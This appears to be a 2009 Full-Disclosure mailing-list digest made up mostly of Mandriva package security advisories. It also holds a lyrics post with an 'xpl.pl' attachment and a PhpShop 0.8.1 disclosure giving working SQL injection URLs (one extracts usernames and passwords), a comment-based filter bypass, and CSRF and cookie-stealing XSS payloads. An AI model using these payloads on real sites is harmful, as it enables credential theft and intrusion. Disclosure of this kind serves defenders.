[Full-disclosure] Flieg wenn du fliegen kannst, lieb wenn du lieben kannst ; fly when you can fly, love when you can love
"Man sagt die Augen sind der Spiegel meiner Seele, und deswegen ist es dunkel an dem Ort an dem ich lebe, in dem kleinen Platz hier drin ist es Herbst, und an die Wand schreib ich mit Blut einen Vers, flieg wenn du fliegen kannst, lieb wenn du lieben kannst, weil du nie kriegst was du kriegen kannst, dort kommen die Fremden und sie suchen den Größten, hör auf dein Herz denn du musst wählen zwischen Gutem und Bösen, Mama, das ist die Nacht in der wir kämpfen und sie zwingen mich dazu, deswegen hasse ich die Menschen, in diesem harten Leben gibt es keinen Ort an dem ich frei sein kann, ausser dann im Garten Eden, ich hab Blasen an den Füssen weil ich Barfuß geh, wenn ich laufe wein ich Salz denn dieser Pfad tut weh, ich wünschte Gott gäb mir ein Pflaster damit Wunden heilen, halte durch denn man muss stark in diesen Stunden sein, hier nimm meine Hand, bitte bleib bei mir ich verliere mein Verstand, sie fangen meinen Mut und brechen meinen Widerstand, denn sie haben Angst weil ich Hoffnung in den Liedern fand." Bushido "They say the eyes are the mirror of my soul, and so it is dark at the place where I live, In here, in the small space, it's autumn, and on the wall with blood I write a verse, fly when you can fly, love when you can love, because you'll never get what you can get, there come the foreigners and they look for the greatest, listen to your heart because you have to choose between good and evil; Mom, this is the night we fight, and they force me to that's why I hate the people, in this hard life, there is no place where I can be free, except then in the garden of Eden, I have blisters on my feet because I go barefoot, I am crying salt when I walk this path because it hurts, I wish to God I'd give a patch to heal wounds, hold through because you have to be strong in these hours, Here take my hand, please stay with me I lose my mind they catch my courage and break my resistance, because they are afraid because I found hope in the songs." Bushido http://www.youtube.com/watch?v=rsBeZgaUG2I xpl.pl Description: Binary data ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:319 ] xine-lib
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:319 http://www.mandriva.com/security/ ___ Package : xine-lib Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: Vulnerabilities have been discovered and corrected in xine-lib: Failure on Ogg files manipulation can lead remote attackers to cause a denial of service by using crafted files (CVE-2008-3231). Failure on manipulation of either MNG or Real or MOD files can lead remote attackers to cause a denial of service by using crafted files (CVE: CVE-2008-5233). Heap-based overflow allows remote attackers to execute arbitrary code by using Quicktime media files holding crafted metadata (CVE-2008-5234). Heap-based overflow allows remote attackers to execute arbitrary code by using either crafted Matroska or Real media files (CVE-2008-5236). Failure on manipulation of either MNG or Quicktime files can lead remote attackers to cause a denial of service by using crafted files (CVE-2008-5237). Multiple heap-based overflow on input plugins (http, net, smb, dvd, dvb, rtsp, rtp, pvr, pnm, file, gnome_vfs, mms) allow attackers to execute arbitrary code by handling that input channels. Further this problem can even lead attackers to cause denial of service (CVE-2008-5239). Heap-based overflow allows attackers to execute arbitrary code by using crafted Matroska media files (MATROSKA_ID_TR_CODECPRIVATE track entry element). Further a failure on handling of Real media files (CONT_TAG header) can lead to a denial of service attack (CVE-2008-5240). Integer underflow allows remote attackers to cause denial of service by using Quicktime media files (CVE-2008-5241). Failure on manipulation of Real media files can lead remote attackers to cause a denial of service by indexing an allocated buffer with a certain input value in a crafted file (CVE-2008-5243). Vulnerabilities of unknown impact - possibly buffer overflow - caused by a condition of video frame preallocation before ascertaining the required length in V4L video input plugin (CVE-2008-5245). Heap-based overflow allows remote attackers to execute arbitrary code by using crafted media files. This vulnerability is in the manipulation of ID3 audio file data tagging mainly used in MP3 file formats (CVE-2008-5246). Integer overflow in the qt_error parse_trak_atom function in demuxers/demux_qt.c in xine-lib 1.1.16.2 and earlier allows remote attackers to execute arbitrary code via a Quicktime movie file with a large count value in an STTS atom, which triggers a heap-based buffer overflow (CVE-2009-1274) Integer overflow in the 4xm demuxer (demuxers/demux_4xm.c) in xine-lib 1.1.16.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a 4X movie file with a large current_track value, a similar issue to CVE-2009-0385 (CVE-2009-0698) Packages for 2008.0 are being provided due to extended support for Corporate products. This update fixes these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3231 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5233 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5234 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5236 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5237 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5239 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5240 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5241 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5243 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5245 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5246 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0698 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1274 ___ Updated Packages: Mandriva Linux 2008.0: 4af13839ca34edcc90fae3c6940005c6 2008.0/i586/libxine1-1.1.8-4.8mdv2008.0.i586.rpm 777f8b97c3d64e5882f0f85be5e1340d 2008.0/i586/libxine-devel-1.1.8-4.8mdv2008.0.i586.rpm 10c7ee6edeb280551e17d0376720f852 2008.0/i586/xine-aa-1.1.8-4.8mdv2008.0.i586.rpm c5607eac6e8378d98f4e27bc0417abbc 2008.0/i586/xine-caca-1.1.8-4.8mdv2008.0.i586.rpm 596d607e9ee75a77b9ec18cee9b3c192 2008.0/i586/xine-dxr3-1.1.8-4.8mdv2008.0.i586.rpm f1c30f1f9288c44a8c6d05e7dc4324c1 2008.0/i586/xine-esd-1.1.8-4.8mdv2008.0.i586.rpm a3b810d75a71c5ac618b1de045baf5fc 2008.0/i586/xine-flac-1.1.8-4.8mdv2008.0.i586.rpm 629c357b6bcc09ceadb05cf8ea9b05a5 2008.0/i586/xine-gnomevfs-1.1.8-4.8mdv2008.0.i586.rpm
[Full-disclosure] [ MDVSA-2009:297-1 ] ffmpeg
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:297-1 http://www.mandriva.com/security/ ___ Package : ffmpeg Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: Vulnerabilities have been discovered and corrected in ffmpeg: - The ffmpeg lavf demuxer allows user-assisted attackers to cause a denial of service (application crash) via a crafted GIF file (CVE-2008-3230) - FFmpeg 0.4.9, as used by MPlayer, allows context-dependent attackers to cause a denial of service (memory consumption) via unknown vectors, aka a Tcp/udp memory leak. (CVE-2008-4869) - Integer signedness error in the fourxm_read_header function in libavformat/4xm.c in FFmpeg before revision 16846 allows remote attackers to execute arbitrary code via a malformed 4X movie file with a large current_track value, which triggers a NULL pointer dereference (CVE-2009-0385) The updated packages fix this issue. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3230 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4869 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0385 ___ Updated Packages: Mandriva Linux 2008.0: 10da9fc12452c7cde9ce292ea53caf10 2008.0/i586/ffmpeg-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm 445a770a40e9dc01a10b6d359671b1af 2008.0/i586/libavformats51-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm a91631838f07bc4bb426324ecb8fb4b2 2008.0/i586/libavutil49-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm 985ed365e67adf02d7c53ad234eb3671 2008.0/i586/libffmpeg51-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm 6e8c5464b517a27fd81e9bf96d2d3476 2008.0/i586/libffmpeg51-devel-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm 1ed84a832c2d512d8295e79b8f60b5cf 2008.0/i586/libffmpeg51-static-devel-0.4.9-3.pre1.8994.2.3mdv2008.0.i586.rpm 9cf052b2ccca2dea0bc80dcef6736108 2008.0/SRPMS/ffmpeg-0.4.9-3.pre1.8994.2.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 4395e487eab704996b16cd1f8e8b8827 2008.0/x86_64/ffmpeg-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm 60f8a5659dc02de6cf2281e13560277e 2008.0/x86_64/lib64avformats51-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm 6fe00332a7f3f0006859b0f321422c7d 2008.0/x86_64/lib64avutil49-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm c7c81b80917163dfee22fa9986fa112e 2008.0/x86_64/lib64ffmpeg51-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm 4aad12d06a19aa84a9b07e412e2a5eab 2008.0/x86_64/lib64ffmpeg51-devel-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm c58315cfa21917e6b6385ad87ef01671 2008.0/x86_64/lib64ffmpeg51-static-devel-0.4.9-3.pre1.8994.2.3mdv2008.0.x86_64.rpm 9cf052b2ccca2dea0bc80dcef6736108 2008.0/SRPMS/ffmpeg-0.4.9-3.pre1.8994.2.3mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGpB0mqjQ0CJFipgRAg6mAJ4lg/DB+u0Kr1NwIfAIs2kuFsJisACgwZjX oq2QknWq5/cMHT7Z29tnXQw= =i9sr -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PhpShop Multiple Vulnerabilities
** Application: PhpShop Version affected: 0.8.1 Website: http://www.phpshop.org/ Discovered By: Andrea Fabrizi Email: andrea.fabr...@gmail.com Web: http://www.andreafabrizi.it Vuln: Multiple Vulnerabilities ** ### SQL INJECTION http://localhost/phpshop-0.8.1/?page=admin/function_list&module_id=11' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- aaa http://localhost/phpshop-0.8.1/?page=shop/flypage&product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5-- aaa http://localhost/phpshop-0.8.1/?page=vendor/vendor_form&vendor_id=1' and '1'='1 http://localhost/phpshop-0.8.1/?page=admin/module_form&module_id=1' and '1'='1 http://localhost/phpshop-0.8.1/?page=admin/user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4' and '1'='1 http://localhost/phpshop-0.8.1/?page=vendor/vendor_category_form&vendor_category_id=6' and '1'='1 http://localhost/phpshop-0.8.1/?page=store/user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc' and '1'='1 http://localhost/phpshop-0.8.1/?page=store/payment_method_form&payment_method_id=1' and '1'='1 http://localhost/phpshop-0.8.1/?page=tax/tax_form&tax_rate_id=2' and '1'='1 ...and many others... The SQL Injection security check can be bypassed replacing spaces with comments (/**/) ### BLIND SQL INJECTION http://localhost/phpshop-0.8.1/?page=shop/browse&category=aaa' and 1=1 -- aaa ### CSRF http://localhost/phpshop-0.8.1/?page=shop/cart&func=cartAdd&product_id=321&; ...and many others... ### XSS http://localhost/phpshop-0.8.1/?page=order/order_print&order_id=1 ">alert(document.cookie); ...and many others... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:284-1 ] gd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:284-1 http://www.mandriva.com/security/ ___ Package : gd Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: A vulnerability has been found and corrected in gd: The _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the GD Graphics Library 2.x, does not properly verify a certain colorsTotal structure member, which might allow remote attackers to conduct buffer overflow or buffer over-read attacks via a crafted GD file, a different vulnerability than CVE-2009-3293. NOTE: some of these details are obtained from third party information (CVE-2009-3546). This update fixes this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3546 ___ Updated Packages: Mandriva Linux 2008.0: b770ed57194e79c086e3f0ab177ed97c 2008.0/i586/gd-utils-2.0.35-1.1mdv2008.0.i586.rpm c1d1ed31374dfd08ef28c19a96053c41 2008.0/i586/libgd2-2.0.35-1.1mdv2008.0.i586.rpm 42b0f7db12bc7d4b5ba16fb5c1c5ba18 2008.0/i586/libgd2-devel-2.0.35-1.1mdv2008.0.i586.rpm 0cdc571626816ba364a0345d4fb1b842 2008.0/i586/libgd2-static-devel-2.0.35-1.1mdv2008.0.i586.rpm 2ffaca3571956e7726a4000a037d629e 2008.0/SRPMS/gd-2.0.35-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 9ec41bc368270fc73cea7ae73be05a82 2008.0/x86_64/gd-utils-2.0.35-1.1mdv2008.0.x86_64.rpm e2e431c378bb7fbf90412f7e76e8620d 2008.0/x86_64/lib64gd2-2.0.35-1.1mdv2008.0.x86_64.rpm 200615aafb2b7f3a0a595383308b779d 2008.0/x86_64/lib64gd2-devel-2.0.35-1.1mdv2008.0.x86_64.rpm ca5db470889f17171dcd7c2c73b2045a 2008.0/x86_64/lib64gd2-static-devel-2.0.35-1.1mdv2008.0.x86_64.rpm 2ffaca3571956e7726a4000a037d629e 2008.0/SRPMS/gd-2.0.35-1.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGnpamqjQ0CJFipgRAk3RAJ9wFWaetcwP4iUeR+SKyLjXT7antQCg9Nnd OAacoxLMyrsjJxkCEwWi1ts= =MJvg -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:252-1 ] perl-IO-Socket-SSL
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:252-1 http://www.mandriva.com/security/ ___ Package : perl-IO-Socket-SSL Date: December 5, 2009 Affected: 2009.0 ___ Problem Description: A vulnerability was discovered and corrected in perl-IO-Socket-SSL: The verify_hostname_of_cert function in the certificate checking feature in IO-Socket-SSL (IO::Socket::SSL) 1.14 through 1.25 only matches the prefix of a hostname when no wildcard is used, which allows remote attackers to bypass the hostname check for a certificate (CVE-2009-3024). This update provides a fix for this vulnerability. Update: Packages were missing for 2009.0, this update addresses the problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3024 ___ Updated Packages: Mandriva Linux 2009.0: 7e37ff49f7a218b12b4635a0fb061c8e 2009.0/i586/perl-IO-Socket-SSL-1.15-1.2mdv2009.0.noarch.rpm ffe8c1ead458cc0c011258f57d4908bf 2009.0/SRPMS/perl-IO-Socket-SSL-1.15-1.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 4297e01f0dc3ee3d86c95b8fe09b07f5 2009.0/x86_64/perl-IO-Socket-SSL-1.15-1.2mdv2009.0.noarch.rpm ffe8c1ead458cc0c011258f57d4908bf 2009.0/SRPMS/perl-IO-Socket-SSL-1.15-1.2mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGnbTmqjQ0CJFipgRAnMpAJ9auGQ0vfyu+BgpH+C/Tvkpc9lEUACgzSV3 R2Th+X3y48iBSWkfM2bbPfE= =bhoP -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:272-1 ] libmikmod
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:272-1 http://www.mandriva.com/security/ ___ Package : libmikmod Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in libmikmod: libmikmod 3.1.9 through 3.2.0, as used by MikMod, SDL-mixer, and possibly other products, relies on the channel count of the last loaded song, rather than the currently playing song, for certain playback calculations, which allows user-assisted attackers to cause a denial of service (application crash) by loading multiple songs (aka MOD files) with different numbers of channels (CVE-2007-6720). libmikmod 3.1.11 through 3.2.0, as used by MikMod and possibly other products, allows user-assisted attackers to cause a denial of service (application crash) by loading an XM file (CVE-2009-0179). This update fixes these vulnerabilities. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0179 ___ Updated Packages: Mandriva Linux 2008.0: 3a471dfbdeb20ddc7690fb7989c3a128 2008.0/i586/libmikmod2-3.1.11a-8.1mdv2008.0.i586.rpm 208ec4e453c86fc86d465747ec77e76e 2008.0/i586/libmikmod-devel-3.1.11a-8.1mdv2008.0.i586.rpm 11b8cbef0a3ae2be83e34f6559ebb769 2008.0/SRPMS/libmikmod-3.1.11a-8.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 1b9a2ff2c7f0d01782f78b4dd1246bff 2008.0/x86_64/lib64mikmod2-3.1.11a-8.1mdv2008.0.x86_64.rpm b87cfa37b6f63c0cc1bb7988185d181d 2008.0/x86_64/lib64mikmod-devel-3.1.11a-8.1mdv2008.0.x86_64.rpm 11b8cbef0a3ae2be83e34f6559ebb769 2008.0/SRPMS/libmikmod-3.1.11a-8.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGnMemqjQ0CJFipgRAu3kAKCVeR9OZuMK6zWeuViVmZpNpQyHswCg42Pc IU+PoYHINtC52q7SjhODZxk= =/y4g -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:318 ] xmlsec1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:318 http://www.mandriva.com/security/ ___ Package : xmlsec1 Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: Multiple security vulnerabilities has been identified and fixed in xmlsec1: A missing check for the recommended minimum length of the truncated form of HMAC-based XML signatures was found in xmlsec1 prior to 1.2.12. An attacker could use this flaw to create a specially-crafted XML file that forges an XML signature, allowing the attacker to bypass authentication that is based on the XML Signature specification (CVE-2009-0217). All versions of libtool prior to 2.2.6b suffers from a local privilege escalation vulnerability that could be exploited under certain conditions to load arbitrary code (CVE-2009-3736). Packages for 2008.0 are being provided due to extended support for Corporate products. This update fixes this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0217 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3736 http://www.kb.cert.org/vuls/id/466161 ___ Updated Packages: Mandriva Linux 2008.0: b74d614ed793451440ea18c7aab434ee 2008.0/i586/libxmlsec1-1-1.2.10-5.1mdv2008.0.i586.rpm 34cc1274710d3c2013ff4c1222d0349d 2008.0/i586/libxmlsec1-devel-1.2.10-5.1mdv2008.0.i586.rpm 88b378d43d3ba44bad7d47c1eb5d6c5c 2008.0/i586/libxmlsec1-gnutls1-1.2.10-5.1mdv2008.0.i586.rpm 7c7e766ab3886c57d1519b83b4b06af8 2008.0/i586/libxmlsec1-gnutls-devel-1.2.10-5.1mdv2008.0.i586.rpm 712c732bc8ff6050fdc6dd108623e63a 2008.0/i586/libxmlsec1-nss1-1.2.10-5.1mdv2008.0.i586.rpm bed9636e852f4c90cd9a5891fb9395ea 2008.0/i586/libxmlsec1-nss-devel-1.2.10-5.1mdv2008.0.i586.rpm 3e6940d49ffc024240b7116250d1f770 2008.0/i586/libxmlsec1-openssl1-1.2.10-5.1mdv2008.0.i586.rpm cb8d177f72966ff06a9a1e08f8c48dbe 2008.0/i586/libxmlsec1-openssl-devel-1.2.10-5.1mdv2008.0.i586.rpm 38ae0ed435d6e5133530d5af4a33883a 2008.0/i586/xmlsec1-1.2.10-5.1mdv2008.0.i586.rpm bf47e5312113b150bdcce2634254b555 2008.0/SRPMS/xmlsec1-1.2.10-5.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 2f16be60c636cc6d286258b7d331f52b 2008.0/x86_64/lib64xmlsec1-1-1.2.10-5.1mdv2008.0.x86_64.rpm dcbfa0192a2a1ed72d9b4f7fc4c31c7f 2008.0/x86_64/lib64xmlsec1-devel-1.2.10-5.1mdv2008.0.x86_64.rpm b7d5a923126d4ab43b9c9868aed26803 2008.0/x86_64/lib64xmlsec1-gnutls1-1.2.10-5.1mdv2008.0.x86_64.rpm 041a56825a59f497dce1085bc0fcf717 2008.0/x86_64/lib64xmlsec1-gnutls-devel-1.2.10-5.1mdv2008.0.x86_64.rpm 5f70fda9524faee1b86e14e7b092e426 2008.0/x86_64/lib64xmlsec1-nss1-1.2.10-5.1mdv2008.0.x86_64.rpm 63c4b923f7cf4bb46e06d966a880ef6c 2008.0/x86_64/lib64xmlsec1-nss-devel-1.2.10-5.1mdv2008.0.x86_64.rpm 62174f73e2d333da65befa79cd85c1ad 2008.0/x86_64/lib64xmlsec1-openssl1-1.2.10-5.1mdv2008.0.x86_64.rpm 6439cacc0520e43b8280758a4a91b042 2008.0/x86_64/lib64xmlsec1-openssl-devel-1.2.10-5.1mdv2008.0.x86_64.rpm e4db63bda5a32757a17be8d4dcd31639 2008.0/x86_64/xmlsec1-1.2.10-5.1mdv2008.0.x86_64.rpm bf47e5312113b150bdcce2634254b555 2008.0/SRPMS/xmlsec1-1.2.10-5.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGm8VmqjQ0CJFipgRAoJbAJ42kcAyU+o1vyhTG3qRCkeqdZrZVwCghcOr q34YlWPMSVOFL9sx5T0/mA4= =WFZU -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:317 ] netpbm
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:317 http://www.mandriva.com/security/ ___ Package : netpbm Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: Multiple security vulnerabilities has been identified and fixed in netpbm: Multiple integer overflows in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via a crafted image file, related to integer multiplication for memory allocation (CVE-2008-3520). Buffer overflow in the jas_stream_printf function in libjasper/base/jas_stream.c in JasPer 1.900.1 might allow context-dependent attackers to have an unknown impact via vectors related to the mif_hdr_put function and use of vsprintf (CVE-2008-3522). pamperspective in Netpbm before 10.35.48 does not properly calculate a window height, which allows context-dependent attackers to cause a denial of service (crash) via a crafted image file that triggers an out-of-bounds read (CVE-2008-4799). Packages for 2008.0 are being provided due to extended support for Corporate products. This update fixes this vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3520 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3522 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4799 ___ Updated Packages: Mandriva Linux 2008.0: 7b0e45d3f024f928bf5efef1523d2bdc 2008.0/i586/libnetpbm10-10.34-8.2mdv2008.0.i586.rpm 1429258b5054e99c9bcf17627ad84ff5 2008.0/i586/libnetpbm-devel-10.34-8.2mdv2008.0.i586.rpm d8a371066d668d750e0d5013b11a5bc4 2008.0/i586/libnetpbm-static-devel-10.34-8.2mdv2008.0.i586.rpm a89f33b6a389d50260acd1fa998a5c6f 2008.0/i586/netpbm-10.34-8.2mdv2008.0.i586.rpm 5a12f1cb9aec58e40d4bddaa4f08495a 2008.0/SRPMS/netpbm-10.34-8.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 53601f6261a9135bcd1bc2fd02f1569d 2008.0/x86_64/lib64netpbm10-10.34-8.2mdv2008.0.x86_64.rpm b8c2205ef64eebf42ae191fcb806523a 2008.0/x86_64/lib64netpbm-devel-10.34-8.2mdv2008.0.x86_64.rpm db3819cfc6341148161d3ee6c0301067 2008.0/x86_64/lib64netpbm-static-devel-10.34-8.2mdv2008.0.x86_64.rpm 6d85ae6f25d97c8defa9891d63721956 2008.0/x86_64/netpbm-10.34-8.2mdv2008.0.x86_64.rpm 5a12f1cb9aec58e40d4bddaa4f08495a 2008.0/SRPMS/netpbm-10.34-8.2mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLGm0dmqjQ0CJFipgRAoWXAJ9sNYf/5SW2JDn/IkfFr680jvpepQCeO00H L+FqAtosGOrP8RcK4oi20EU= =6kqK -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:260-1 ] imagemagick
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:260-1 http://www.mandriva.com/security/ ___ Package : imagemagick Date: December 5, 2009 Affected: 2008.0 ___ Problem Description: A vulnerability has been found and corrected in ImageMagick, which could lead to integer overflow in the XMakeImage function in magick/xwindow.c, allowing remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted TIFF file, which triggers a buffer overflow (CVE-2009-1882). This update fixes this vulnerability. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1882 ___ Updated Packages: Mandriva Linux 2008.0: a518c3799c49cd407ca123eedd27631c 2008.0/i586/imagemagick-6.3.2.9-10.3mdv2008.0.i586.rpm 72f4b32919fa8420cca925510fca21c8 2008.0/i586/imagemagick-desktop-6.3.2.9-10.3mdv2008.0.i586.rpm b0e5e58e38f7acd560aeb5bd53d065ed 2008.0/i586/imagemagick-doc-6.3.2.9-10.3mdv2008.0.i586.rpm ef3b5f6c1800fd10fbf7a437774d986c 2008.0/i586/libmagick10.7.0-6.3.2.9-10.3mdv2008.0.i586.rpm a3549fa4fa21089ff6b43e102932949e 